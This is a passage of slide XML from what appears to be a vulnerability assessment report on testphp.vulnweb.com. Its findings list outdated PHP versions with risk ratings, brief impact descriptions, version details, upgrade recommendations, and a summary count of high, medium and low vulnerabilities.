            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564749" y="918318"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>18. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.4 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="471" name="Google Shape;471;p57"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.4. Such versions may be affected by various issues, including but not limited to several overflows.</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                              HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This issue allows attacker to bypass open_basedir restrictions via vectors related to the length of a filename.</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.4 or later.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>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472" name="Google Shape;472;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7280366" y="2969623"/>
            <a:ext cx="635726" cy="459377"/>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473" name="Google Shape;473;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10887166" y="2969623"/>
            <a:ext cx="635726" cy="459377"/>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474" name="Google Shape;474;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9152709" y="2969623"/>
            <a:ext cx="635726" cy="459377"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="979279"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.4 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696686" y="1820091"/>
            <a:ext cx="9936480" cy="2342606"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512498" y="961862"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>19. PHP &lt; 5.2.5 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="486" name="Google Shape;486;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.5. Such versions may be affected by various issues, including but not limited to several buffer overflows.</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                         </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>             HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>This issue will allow context dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files.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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.5 or later.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>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487" name="Google Shape;487;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210697" y="2969623"/>
            <a:ext cx="531223" cy="459377"/>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488" name="Google Shape;488;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9187543" y="2969623"/>
            <a:ext cx="531223" cy="459377"/>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489" name="Google Shape;489;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10807337" y="2969623"/>
            <a:ext cx="531223" cy="459377"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="95" name="Google Shape;95;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="355600" y="2406226"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{B60C7370-9768-4E96-B8B1-DA89375A92FC}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2646675"/>
                <a:gridCol w="2646675"/>
              </a:tblGrid>
              <a:tr h="794175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>TYPE OF RISK</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F14167"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800" u="none" cap="none" strike="noStrike"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>NO. OF VULNERABILITIES</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F14167"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="619750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>15</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F8CFB6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="650250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>MEDIUM</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>14</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="F8CFB6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="650250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>LOW</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="92D050"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FFF2CC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="96" name="Google Shape;96;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6024880" y="1188720"/>
          <a:ext cx="6045200" cy="5425440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart r:id="rId3"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775855" y="517236"/>
            <a:ext cx="7970981" cy="86177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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>STATISTICAL DETAILS OF VULNERABILITIES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="987987"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.5 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
